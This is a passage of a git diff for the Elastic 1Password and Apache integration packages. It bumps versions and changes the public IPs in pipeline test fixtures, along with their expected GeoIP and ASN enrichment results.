diff --git a/packages/1password/changelog.yml b/packages/1password/changelog.yml
index 942a3b88c39..3ae475f53fd 100644
--- a/packages/1password/changelog.yml
+++ b/packages/1password/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "0.2.1"
+  changes:
+    - description: Change test public IPs to the supported subset
+      type: bugfix
+      link: https://github.com/elastic/integrations/pull/2327
 - version: "0.2.0"
   changes:
     - description: Add 8.0.0 version constraint
diff --git a/packages/1password/data_stream/item_usages/_dev/test/pipeline/test-itemusages.json b/packages/1password/data_stream/item_usages/_dev/test/pipeline/test-itemusages.json
index 926a1ae7d4b..2815f0b47ac 100644
--- a/packages/1password/data_stream/item_usages/_dev/test/pipeline/test-itemusages.json
+++ b/packages/1password/data_stream/item_usages/_dev/test/pipeline/test-itemusages.json
@@ -2,11 +2,11 @@
 "events": [
 {
 "@timestamp": "2021-08-30T22:57:42.484Z",
-"message": "{\"uuid\":\"MCQODBBWJD5HISKYNP3HJPV2DV\",\"timestamp\":\"2021-08-30T18:57:42.484Z\",\"used_version\":1,\"vault_uuid\":\"jaqxqf5qylslqiitnduawrndc5\",\"item_uuid\":\"bvwmmwxisuca7wbehrbyqhag54\",\"user\":{\"uuid\":\"OJQGU46KAPROEJLCK674RHSAY5\",\"name\":\"Name\",\"email\":\"email@1password.com\"},\"client\":{\"app_name\":\"1Password Browser Extension\",\"app_version\":\"1109\",\"platform_name\":\"Chrome\",\"platform_version\":\"93.0.4577.62\",\"os_name\":\"Android\",\"os_version\":\"10\",\"ip_address\":\"1.1.1.1\"}}"
+"message": "{\"uuid\":\"MCQODBBWJD5HISKYNP3HJPV2DV\",\"timestamp\":\"2021-08-30T18:57:42.484Z\",\"used_version\":1,\"vault_uuid\":\"jaqxqf5qylslqiitnduawrndc5\",\"item_uuid\":\"bvwmmwxisuca7wbehrbyqhag54\",\"user\":{\"uuid\":\"OJQGU46KAPROEJLCK674RHSAY5\",\"name\":\"Name\",\"email\":\"email@1password.com\"},\"client\":{\"app_name\":\"1Password Browser Extension\",\"app_version\":\"1109\",\"platform_name\":\"Chrome\",\"platform_version\":\"93.0.4577.62\",\"os_name\":\"Android\",\"os_version\":\"10\",\"ip_address\":\"89.160.20.156\"}}"
 },
 {
 "@timestamp": "2021-08-30T22:57:42.484Z",
-"message": "{\"uuid\":\"5HBWJDWCQADISKY2DVBNP3HJPV\",\"timestamp\":\"2021-08-30T19:10:00.123Z\",\"used_version\":1,\"vault_uuid\":\"jaqxqf5qylslqiitnduawrndc5\",\"item_uuid\":\"bvwmmwxisuca7wbehrbyqhag54\",\"user\":{\"uuid\":\"OJQGU46KAPROEJLCK674RHSAY5\",\"name\":\"Name\",\"email\":\"email@1password.com\"},\"client\":{\"app_name\":\"1Password Browser Extension\",\"app_version\":\"1109\",\"platform_name\":\"Chrome\",\"platform_version\":\"93.0.4577.62\",\"os_name\":\"Android\",\"os_version\":\"10\",\"ip_address\":\"1.1.1.1\"}}"
+"message": "{\"uuid\":\"5HBWJDWCQADISKY2DVBNP3HJPV\",\"timestamp\":\"2021-08-30T19:10:00.123Z\",\"used_version\":1,\"vault_uuid\":\"jaqxqf5qylslqiitnduawrndc5\",\"item_uuid\":\"bvwmmwxisuca7wbehrbyqhag54\",\"user\":{\"uuid\":\"OJQGU46KAPROEJLCK674RHSAY5\",\"name\":\"Name\",\"email\":\"email@1password.com\"},\"client\":{\"app_name\":\"1Password Browser Extension\",\"app_version\":\"1109\",\"platform_name\":\"Chrome\",\"platform_version\":\"93.0.4577.62\",\"os_name\":\"Android\",\"os_version\":\"10\",\"ip_address\":\"89.160.20.156\"}}"
 }
 ]
 }
\ No newline at end of file
diff --git a/packages/1password/data_stream/item_usages/_dev/test/pipeline/test-itemusages.json-expected.json b/packages/1password/data_stream/item_usages/_dev/test/pipeline/test-itemusages.json-expected.json
index dd39235fd29..c5e3363a0aa 100644
--- a/packages/1password/data_stream/item_usages/_dev/test/pipeline/test-itemusages.json-expected.json
+++ b/packages/1password/data_stream/item_usages/_dev/test/pipeline/test-itemusages.json-expected.json
@@ -1,19 +1,6 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "1.1.1.1" - ], - "user": [ - "OJQGU46KAPROEJLCK674RHSAY5", - "email@1password.com", - "Name" - ] - }, "onepassword": { "used_version": 1, "client": {
@@ -27,38 +14,55 @@ "vault_uuid": "jaqxqf5qylslqiitnduawrndc5" }, "@timestamp": "2021-08-30T18:57:42.484Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "user": [ + "OJQGU46KAPROEJLCK674RHSAY5", + "email@1password.com", + "Name" + ], + "ip": [ + "89.160.20.156" + ] + }, "os": { "name": "Android", "version": "10" }, "source": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 143.2104, - "lat": -33.494 - }, - "country_iso_code": "AU" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 13335, + "number": 29518, "organization": { - "name": "Cloudflare, Inc." + "name": "Bredband2 AB" } }, - "ip": "1.1.1.1" + "ip": "89.160.20.156" }, "event": { + "ingested": "2021-12-09T13:30:28.123174500Z", + "original": "{\"uuid\":\"MCQODBBWJD5HISKYNP3HJPV2DV\",\"timestamp\":\"2021-08-30T18:57:42.484Z\",\"used_version\":1,\"vault_uuid\":\"jaqxqf5qylslqiitnduawrndc5\",\"item_uuid\":\"bvwmmwxisuca7wbehrbyqhag54\",\"user\":{\"uuid\":\"OJQGU46KAPROEJLCK674RHSAY5\",\"name\":\"Name\",\"email\":\"email@1password.com\"},\"client\":{\"app_name\":\"1Password Browser Extension\",\"app_version\":\"1109\",\"platform_name\":\"Chrome\",\"platform_version\":\"93.0.4577.62\",\"os_name\":\"Android\",\"os_version\":\"10\",\"ip_address\":\"89.160.20.156\"}}", "category": [ "file" ], - "created": "2021-08-30T22:57:42.484Z", - "kind": "event", - "original": "{\"uuid\":\"MCQODBBWJD5HISKYNP3HJPV2DV\",\"timestamp\":\"2021-08-30T18:57:42.484Z\",\"used_version\":1,\"vault_uuid\":\"jaqxqf5qylslqiitnduawrndc5\",\"item_uuid\":\"bvwmmwxisuca7wbehrbyqhag54\",\"user\":{\"uuid\":\"OJQGU46KAPROEJLCK674RHSAY5\",\"name\":\"Name\",\"email\":\"email@1password.com\"},\"client\":{\"app_name\":\"1Password Browser 
Extension\",\"app_version\":\"1109\",\"platform_name\":\"Chrome\",\"platform_version\":\"93.0.4577.62\",\"os_name\":\"Android\",\"os_version\":\"10\",\"ip_address\":\"1.1.1.1\"}}", "type": [ "access" - ] + ], + "created": "2021-08-30T22:57:42.484Z", + "kind": "event" }, "user": { "email": "email@1password.com", @@ -70,19 +74,6 @@ ] }, { - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "1.1.1.1" - ], - "user": [ - "OJQGU46KAPROEJLCK674RHSAY5", - "email@1password.com", - "Name" - ] - }, "onepassword": { "used_version": 1, "client": { 
@@ -96,38 +87,55 @@ "vault_uuid": "jaqxqf5qylslqiitnduawrndc5" }, "@timestamp": "2021-08-30T19:10:00.123Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "user": [ + "OJQGU46KAPROEJLCK674RHSAY5", + "email@1password.com", + "Name" + ], + "ip": [ + "89.160.20.156" + ] + }, "os": { "name": "Android", "version": "10" }, "source": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 143.2104, - "lat": -33.494 - }, - "country_iso_code": "AU" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 13335, + "number": 29518, "organization": { - "name": "Cloudflare, Inc." + "name": "Bredband2 AB" } }, - "ip": "1.1.1.1" + "ip": "89.160.20.156" }, "event": { + "ingested": "2021-12-09T13:30:28.123178700Z", + "original": "{\"uuid\":\"5HBWJDWCQADISKY2DVBNP3HJPV\",\"timestamp\":\"2021-08-30T19:10:00.123Z\",\"used_version\":1,\"vault_uuid\":\"jaqxqf5qylslqiitnduawrndc5\",\"item_uuid\":\"bvwmmwxisuca7wbehrbyqhag54\",\"user\":{\"uuid\":\"OJQGU46KAPROEJLCK674RHSAY5\",\"name\":\"Name\",\"email\":\"email@1password.com\"},\"client\":{\"app_name\":\"1Password Browser Extension\",\"app_version\":\"1109\",\"platform_name\":\"Chrome\",\"platform_version\":\"93.0.4577.62\",\"os_name\":\"Android\",\"os_version\":\"10\",\"ip_address\":\"89.160.20.156\"}}", "category": [ "file" ], - "created": "2021-08-30T22:57:42.484Z", - "kind": "event", - "original": "{\"uuid\":\"5HBWJDWCQADISKY2DVBNP3HJPV\",\"timestamp\":\"2021-08-30T19:10:00.123Z\",\"used_version\":1,\"vault_uuid\":\"jaqxqf5qylslqiitnduawrndc5\",\"item_uuid\":\"bvwmmwxisuca7wbehrbyqhag54\",\"user\":{\"uuid\":\"OJQGU46KAPROEJLCK674RHSAY5\",\"name\":\"Name\",\"email\":\"email@1password.com\"},\"client\":{\"app_name\":\"1Password Browser 
Extension\",\"app_version\":\"1109\",\"platform_name\":\"Chrome\",\"platform_version\":\"93.0.4577.62\",\"os_name\":\"Android\",\"os_version\":\"10\",\"ip_address\":\"1.1.1.1\"}}", "type": [ "access" - ] + ], + "created": "2021-08-30T22:57:42.484Z", + "kind": "event" }, "user": { "email": "email@1password.com", diff --git a/packages/1password/data_stream/signin_attempts/_dev/test/pipeline/test-signinattempts.json b/packages/1password/data_stream/signin_attempts/_dev/test/pipeline/test-signinattempts.json index 53c12222c4e..d43ccf567f5 100644 --- a/packages/1password/data_stream/signin_attempts/_dev/test/pipeline/test-signinattempts.json +++ b/packages/1password/data_stream/signin_attempts/_dev/test/pipeline/test-signinattempts.json 
@@ -2,11 +2,11 @@
 "events": [
 {
 "@timestamp": "2021-08-30T22:57:42.484Z",
-"message": "{\"uuid\":\"HGIF4OEWXDTVWKEQDIWTKV26HU\",\"session_uuid\":\"UED4KFZ5BH37IQWTJ7LG4VPWK7\",\"timestamp\":\"2021-08-11T14:28:03Z\",\"country\":\"AR\",\"category\":\"success\",\"type\":\"credentials_ok\",\"details\":null,\"target_user\":{\"uuid\":\"OJQGU46KAPROEJLCK674RHSAY5\",\"name\":\"Name\",\"email\":\"email@1password.com\"},\"client\":{\"app_name\":\"1Password Browser Extension\",\"app_version\":\"1109\",\"platform_name\":\"Chrome\",\"platform_version\":\"93.0.4577.62\",\"os_name\":\"Android\",\"os_version\":\"10\",\"ip_address\":\"1.1.1.1\"}}"
+"message": "{\"uuid\":\"HGIF4OEWXDTVWKEQDIWTKV26HU\",\"session_uuid\":\"UED4KFZ5BH37IQWTJ7LG4VPWK7\",\"timestamp\":\"2021-08-11T14:28:03Z\",\"country\":\"AR\",\"category\":\"success\",\"type\":\"credentials_ok\",\"details\":null,\"target_user\":{\"uuid\":\"OJQGU46KAPROEJLCK674RHSAY5\",\"name\":\"Name\",\"email\":\"email@1password.com\"},\"client\":{\"app_name\":\"1Password Browser Extension\",\"app_version\":\"1109\",\"platform_name\":\"Chrome\",\"platform_version\":\"93.0.4577.62\",\"os_name\":\"Android\",\"os_version\":\"10\",\"ip_address\":\"89.160.20.156\"}}"
 },
 {
 "@timestamp": "2021-08-30T22:57:42.484Z",
-"message": "{\"uuid\":\"QVWKEOEWXU2DIDHWTK6HGIF4TV\",\"session_uuid\":\"UED4KFZ5BH37IQWTJ7LG4VPWK7\",\"timestamp\":\"2021-08-11T15:04:22Z\",\"country\":\"AR\",\"category\":\"credentials_failed\",\"type\":\"password_secret_bad\",\"details\":null,\"target_user\":{\"uuid\":\"OJQGU46KAPROEJLCK674RHSAY5\",\"name\":\"Name\",\"email\":\"email@1password.com\"},\"client\":{\"app_name\":\"1Password Browser Extension\",\"app_version\":\"1109\",\"platform_name\":\"Chrome\",\"platform_version\":\"93.0.4577.62\",\"os_name\":\"Android\",\"os_version\":\"10\",\"ip_address\":\"1.1.1.1\"}}"
+"message": "{\"uuid\":\"QVWKEOEWXU2DIDHWTK6HGIF4TV\",\"session_uuid\":\"UED4KFZ5BH37IQWTJ7LG4VPWK7\",\"timestamp\":\"2021-08-11T15:04:22Z\",\"country\":\"AR\",\"category\":\"credentials_failed\",\"type\":\"password_secret_bad\",\"details\":null,\"target_user\":{\"uuid\":\"OJQGU46KAPROEJLCK674RHSAY5\",\"name\":\"Name\",\"email\":\"email@1password.com\"},\"client\":{\"app_name\":\"1Password Browser Extension\",\"app_version\":\"1109\",\"platform_name\":\"Chrome\",\"platform_version\":\"93.0.4577.62\",\"os_name\":\"Android\",\"os_version\":\"10\",\"ip_address\":\"89.160.20.156\"}}"
 }
 ]
 }
\ No newline at end of file
diff --git a/packages/1password/data_stream/signin_attempts/_dev/test/pipeline/test-signinattempts.json-expected.json b/packages/1password/data_stream/signin_attempts/_dev/test/pipeline/test-signinattempts.json-expected.json
index 7c0e571dfd2..42bc15c2db4 100644
--- a/packages/1password/data_stream/signin_attempts/_dev/test/pipeline/test-signinattempts.json-expected.json
+++ b/packages/1password/data_stream/signin_attempts/_dev/test/pipeline/test-signinattempts.json-expected.json
@@ -1,19 +1,6 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "1.1.1.1" - ], - "user": [ - "OJQGU46KAPROEJLCK674RHSAY5", - "email@1password.com", - "Name" - ] - }, "onepassword": { "country": "AR", "client": {
@@ -28,40 +15,57 @@ "session_uuid": "UED4KFZ5BH37IQWTJ7LG4VPWK7" }, "@timestamp": "2021-08-11T14:28:03.000Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "user": [ + "OJQGU46KAPROEJLCK674RHSAY5", + "email@1password.com", + "Name" + ], + "ip": [ + "89.160.20.156" + ] + }, "os": { "name": "Android", "version": "10" }, "source": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 143.2104, - "lat": -33.494 - }, - "country_iso_code": "AU" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 13335, + "number": 29518, "organization": { - "name": "Cloudflare, Inc." + "name": "Bredband2 AB" } }, - "ip": "1.1.1.1" + "ip": "89.160.20.156" }, "event": { + "ingested": "2021-12-09T13:30:28.577677500Z", + "original": "{\"uuid\":\"HGIF4OEWXDTVWKEQDIWTKV26HU\",\"session_uuid\":\"UED4KFZ5BH37IQWTJ7LG4VPWK7\",\"timestamp\":\"2021-08-11T14:28:03Z\",\"country\":\"AR\",\"category\":\"success\",\"type\":\"credentials_ok\",\"details\":null,\"target_user\":{\"uuid\":\"OJQGU46KAPROEJLCK674RHSAY5\",\"name\":\"Name\",\"email\":\"email@1password.com\"},\"client\":{\"app_name\":\"1Password Browser Extension\",\"app_version\":\"1109\",\"platform_name\":\"Chrome\",\"platform_version\":\"93.0.4577.62\",\"os_name\":\"Android\",\"os_version\":\"10\",\"ip_address\":\"89.160.20.156\"}}", + "created": "2021-08-30T22:57:42.484Z", + "kind": "event", "action": "success", "category": [ "authentication" ], - "created": "2021-08-30T22:57:42.484Z", - "kind": "event", - "original": 
"{\"uuid\":\"HGIF4OEWXDTVWKEQDIWTKV26HU\",\"session_uuid\":\"UED4KFZ5BH37IQWTJ7LG4VPWK7\",\"timestamp\":\"2021-08-11T14:28:03Z\",\"country\":\"AR\",\"category\":\"success\",\"type\":\"credentials_ok\",\"details\":null,\"target_user\":{\"uuid\":\"OJQGU46KAPROEJLCK674RHSAY5\",\"name\":\"Name\",\"email\":\"email@1password.com\"},\"client\":{\"app_name\":\"1Password Browser Extension\",\"app_version\":\"1109\",\"platform_name\":\"Chrome\",\"platform_version\":\"93.0.4577.62\",\"os_name\":\"Android\",\"os_version\":\"10\",\"ip_address\":\"1.1.1.1\"}}", - "outcome": "success", "type": [ "info" - ] + ], + "outcome": "success" }, "user": { "email": "email@1password.com", @@ -73,19 +77,6 @@ ] }, { - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "1.1.1.1" - ], - "user": [ - "OJQGU46KAPROEJLCK674RHSAY5", - "email@1password.com", - "Name" - ] - }, "onepassword": { "country": "AR", "client": { 
@@ -100,40 +91,57 @@ "session_uuid": "UED4KFZ5BH37IQWTJ7LG4VPWK7" }, "@timestamp": "2021-08-11T15:04:22.000Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "user": [ + "OJQGU46KAPROEJLCK674RHSAY5", + "email@1password.com", + "Name" + ], + "ip": [ + "89.160.20.156" + ] + }, "os": { "name": "Android", "version": "10" }, "source": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 143.2104, - "lat": -33.494 - }, - "country_iso_code": "AU" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 13335, + "number": 29518, "organization": { - "name": "Cloudflare, Inc." + "name": "Bredband2 AB" } }, - "ip": "1.1.1.1" + "ip": "89.160.20.156" }, "event": { + "ingested": "2021-12-09T13:30:28.577687Z", + "original": "{\"uuid\":\"QVWKEOEWXU2DIDHWTK6HGIF4TV\",\"session_uuid\":\"UED4KFZ5BH37IQWTJ7LG4VPWK7\",\"timestamp\":\"2021-08-11T15:04:22Z\",\"country\":\"AR\",\"category\":\"credentials_failed\",\"type\":\"password_secret_bad\",\"details\":null,\"target_user\":{\"uuid\":\"OJQGU46KAPROEJLCK674RHSAY5\",\"name\":\"Name\",\"email\":\"email@1password.com\"},\"client\":{\"app_name\":\"1Password Browser Extension\",\"app_version\":\"1109\",\"platform_name\":\"Chrome\",\"platform_version\":\"93.0.4577.62\",\"os_name\":\"Android\",\"os_version\":\"10\",\"ip_address\":\"89.160.20.156\"}}", + "created": "2021-08-30T22:57:42.484Z", + "kind": "event", "action": "credentials_failed", "category": [ "authentication" ], - "created": "2021-08-30T22:57:42.484Z", - "kind": "event", - "original": 
"{\"uuid\":\"QVWKEOEWXU2DIDHWTK6HGIF4TV\",\"session_uuid\":\"UED4KFZ5BH37IQWTJ7LG4VPWK7\",\"timestamp\":\"2021-08-11T15:04:22Z\",\"country\":\"AR\",\"category\":\"credentials_failed\",\"type\":\"password_secret_bad\",\"details\":null,\"target_user\":{\"uuid\":\"OJQGU46KAPROEJLCK674RHSAY5\",\"name\":\"Name\",\"email\":\"email@1password.com\"},\"client\":{\"app_name\":\"1Password Browser Extension\",\"app_version\":\"1109\",\"platform_name\":\"Chrome\",\"platform_version\":\"93.0.4577.62\",\"os_name\":\"Android\",\"os_version\":\"10\",\"ip_address\":\"1.1.1.1\"}}", - "outcome": "failure", "type": [ "info" - ] + ], + "outcome": "failure" }, "user": { "email": "email@1password.com", diff --git a/packages/1password/manifest.yml b/packages/1password/manifest.yml index 41bf202ed8c..d2cfdae6fe6 100644 --- a/packages/1password/manifest.yml +++ b/packages/1password/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: 1password title: "1Password Events Reporting" -version: 0.2.0 +version: 0.2.1 license: basic description: Collect events from 1Password Events API with Elastic Agent. type: integration diff --git a/packages/apache/changelog.yml b/packages/apache/changelog.yml index 4afe40be147..565a75f4861 100644 --- a/packages/apache/changelog.yml +++ b/packages/apache/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.3.3" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.3.2" changes: - description: Fix ML module manifest query to ignore frozen and cold tiers diff --git a/packages/apache/data_stream/access/_dev/test/pipeline/test-access-basic.log-expected.json b/packages/apache/data_stream/access/_dev/test/pipeline/test-access-basic.log-expected.json index ff3100d9c96..481ed5c4e5d 100644 --- a/packages/apache/data_stream/access/_dev/test/pipeline/test-access-basic.log-expected.json 
+++ b/packages/apache/data_stream/access/_dev/test/pipeline/test-access-basic.log-expected.json @@ -25,7 +25,7 @@ "ip": "::1" }, "event": { - "ingested": "2021-06-09T07:19:56.054928200Z", + "ingested": "2021-12-09T13:30:29.903774500Z", "original": "::1 - - [26/Dec/2016:16:16:29 +0200] \"GET /favicon.ico HTTP/1.1\" 404 209", "category": "web", "kind": "event", @@ -77,7 +77,7 @@ } }, "event": { - "ingested": "2021-06-09T07:19:56.054985900Z", + "ingested": "2021-12-09T13:30:29.903783200Z", "original": "192.168.33.1 - - [26/Dec/2016:16:22:13 +0000] \"GET /hello HTTP/1.1\" 404 499 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:50.0) Gecko/20100101 Firefox/50.0\"", "category": "web", "kind": "event", @@ -119,7 +119,7 @@ "ip": "::1" }, "event": { - "ingested": "2021-06-09T07:19:56.054995600Z", + "ingested": "2021-12-09T13:30:29.903788600Z", "original": "::1 - - [26/Dec/2016:16:16:48 +0200] \"-\" 408 -", "category": "web", "kind": "event", @@ -166,7 +166,7 @@ } }, "event": { - "ingested": "2021-06-09T07:19:56.055003900Z", + "ingested": "2021-12-09T13:30:29.903792500Z", "original": "172.17.0.1 - - [29/May/2017:19:02:48 +0000] \"GET /stringpatch HTTP/1.1\" 404 612 \"-\" \"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2\" \"-\"", "category": "web", "kind": "event", @@ -223,7 +223,7 @@ } }, "event": { - "ingested": "2021-06-09T07:19:56.055010300Z", + "ingested": "2021-12-09T13:30:29.903797600Z", "original": "monitoring-server - - [29/May/2017:19:02:48 +0000] \"GET /status HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2\" \"-\"", "category": "web", "kind": "event", @@ -271,7 +271,7 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-06-09T07:19:56.055016Z", + "ingested": "2021-12-09T13:30:29.903803900Z", "original": "127.0.0.1 - - [02/Feb/2019:05:38:45 +0100] \"-\" 408 152 \"-\" \"-\"", "category": "web", "kind": "event", 
@@ -326,7 +326,7 @@ } }, "event": { - "ingested": "2021-06-09T07:19:56.055021900Z", + "ingested": "2021-12-09T13:30:29.903809300Z", "original": "monitoring-server - - [29/May/2017:19:02:48 +0000] \"GET /A%20Beka%20G1%20Howe/029_AND_30/15%20reading%20elephants.mp4 HTTP/1.1\" 200 612 \"-\" \"Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2\" \"-\"", "category": "web", "kind": "event",
diff --git a/packages/apache/data_stream/access/_dev/test/pipeline/test-access-darwin.log b/packages/apache/data_stream/access/_dev/test/pipeline/test-access-darwin.log
index 1498b23dedd..6b1ba50b177 100644
--- a/packages/apache/data_stream/access/_dev/test/pipeline/test-access-darwin.log
+++ b/packages/apache/data_stream/access/_dev/test/pipeline/test-access-darwin.log
@@ -1,6 +1,6 @@
 ::1 - - [26/Dec/2016:16:16:28 +0200] "GET / HTTP/1.1" 200 45
 ::1 - - [26/Dec/2016:16:16:29 +0200] "GET /favicon.ico HTTP/1.1" 404 209
 ::1 - - [26/Dec/2016:16:16:48 +0200] "-" 408 -
-77.179.66.156 - - [26/Dec/2016:18:23:35 +0200] "GET / HTTP/1.1" 200 45
-77.179.66.156 - - [26/Dec/2016:18:23:41 +0200] "GET /notfound HTTP/1.1" 404 206
-77.179.66.156 - - [26/Dec/2016:18:23:45 +0200] "GET /hmm HTTP/1.1" 404 201
+89.160.20.156 - - [26/Dec/2016:18:23:35 +0200] "GET / HTTP/1.1" 200 45
+89.160.20.156 - - [26/Dec/2016:18:23:41 +0200] "GET /notfound HTTP/1.1" 404 206
+89.160.20.156 - - [26/Dec/2016:18:23:45 +0200] "GET /hmm HTTP/1.1" 404 201
diff --git a/packages/apache/data_stream/access/_dev/test/pipeline/test-access-darwin.log-expected.json b/packages/apache/data_stream/access/_dev/test/pipeline/test-access-darwin.log-expected.json
index e513b05442b..c893102f466 100644
--- a/packages/apache/data_stream/access/_dev/test/pipeline/test-access-darwin.log-expected.json
+++ b/packages/apache/data_stream/access/_dev/test/pipeline/test-access-darwin.log-expected.json
@@ -25,7 +25,7 @@ "ip": "::1" }, "event": { - "ingested": "2021-06-09T07:19:56.288458400Z", + "ingested": "2021-12-09T13:30:30.879403900Z", "original": "::1 - - [26/Dec/2016:16:16:28 +0200] \"GET / HTTP/1.1\" 200 45", "category": "web", "kind": "event", @@ -68,7 +68,7 @@ "ip": "::1" }, "event": { - "ingested": "2021-06-09T07:19:56.288480800Z", + "ingested": "2021-12-09T13:30:30.879409400Z", "original": "::1 - - [26/Dec/2016:16:16:29 +0200] \"GET /favicon.ico HTTP/1.1\" 404 209", "category": "web", "kind": "event", @@ -105,7 +105,7 @@ "ip": "::1" }, "event": { - "ingested": "2021-06-09T07:19:56.288486700Z", + "ingested": "2021-12-09T13:30:30.879413800Z", "original": "::1 - - [26/Dec/2016:16:16:48 +0200] \"-\" 408 -", "category": "web", "kind": "event", @@ -142,28 +142,28 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "DE-RP", - "city_name": "Germersheim", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Rheinland-Pfalz", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 8.3639, - "lat": 49.2231 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 6805, + "number": 29518, "organization": { - "name": "Telefonica Germany" + "name": "Bredband2 AB" } }, - "address": "77.179.66.156", - "ip": "77.179.66.156" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-06-09T07:19:56.288491300Z", - "original": "77.179.66.156 - - [26/Dec/2016:18:23:35 +0200] \"GET / HTTP/1.1\" 200 45", + "ingested": "2021-12-09T13:30:30.879418Z", + "original": "89.160.20.156 - - [26/Dec/2016:18:23:35 +0200] \"GET / HTTP/1.1\" 200 45", "category": "web", "kind": "event", "created": "2020-04-28T11:07:58.223Z", 
@@ -203,28 +203,28 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "DE-RP", - "city_name": "Germersheim", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Rheinland-Pfalz", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 8.3639, - "lat": 49.2231 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 6805, + "number": 29518, "organization": { - "name": "Telefonica Germany" + "name": "Bredband2 AB" } }, - "address": "77.179.66.156", - "ip": "77.179.66.156" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-06-09T07:19:56.288496800Z", - "original": "77.179.66.156 - - [26/Dec/2016:18:23:41 +0200] \"GET /notfound HTTP/1.1\" 404 206", + "ingested": "2021-12-09T13:30:30.879422100Z", + "original": "89.160.20.156 - - [26/Dec/2016:18:23:41 +0200] \"GET /notfound HTTP/1.1\" 404 206", "category": "web", "kind": "event", "created": "2020-04-28T11:07:58.223Z", 
@@ -264,28 +264,28 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "DE-RP", - "city_name": "Germersheim", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Rheinland-Pfalz", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 8.3639, - "lat": 49.2231 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 6805, + "number": 29518, "organization": { - "name": "Telefonica Germany" + "name": "Bredband2 AB" } }, - "address": "77.179.66.156", - "ip": "77.179.66.156" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-06-09T07:19:56.288501500Z", - "original": "77.179.66.156 - - [26/Dec/2016:18:23:45 +0200] \"GET /hmm HTTP/1.1\" 404 201", + "ingested": "2021-12-09T13:30:30.879427100Z", + "original": "89.160.20.156 - - [26/Dec/2016:18:23:45 +0200] \"GET /hmm HTTP/1.1\" 404 201", "category": "web", "kind": "event", "created": "2020-04-28T11:07:58.223Z", diff --git a/packages/apache/data_stream/access/_dev/test/pipeline/test-access-ssl-request.log b/packages/apache/data_stream/access/_dev/test/pipeline/test-access-ssl-request.log index 5b65e3235d5..0a59aed766c 100644 --- a/packages/apache/data_stream/access/_dev/test/pipeline/test-access-ssl-request.log +++ b/packages/apache/data_stream/access/_dev/test/pipeline/test-access-ssl-request.log 
@@ -1,2 +1,2 @@
 [10/Aug/2018:09:45:56 +0200] 172.30.0.119 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 "GET /nagiosxi/ajaxhelper.php?cmd=getxicoreajax&opts=%7B%22func%22%3A%22get_admin_tasks_html%22%2C%22args%22%3A%22%22%7D&nsp=b5c7d5d4b6f7d0cf0c92f9cbdf737f6a5c838218425e6ae21 HTTP/1.1" 1375
-[16/Oct/2019:11:53:47 +0200] 11.19.0.217 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256 "GET /appl/ajaxhelper.php?cmd=getxicoreajax&opts=%7B%22func%22%3A%22get_pagetop_alert_content_html%22%2C%22args%22%3A%22%22%7D&nsp=c2700eab9797eda8a9f65a3ab17a6adbceccd60a6cca7708650a5923950d HTTP/1.1" -
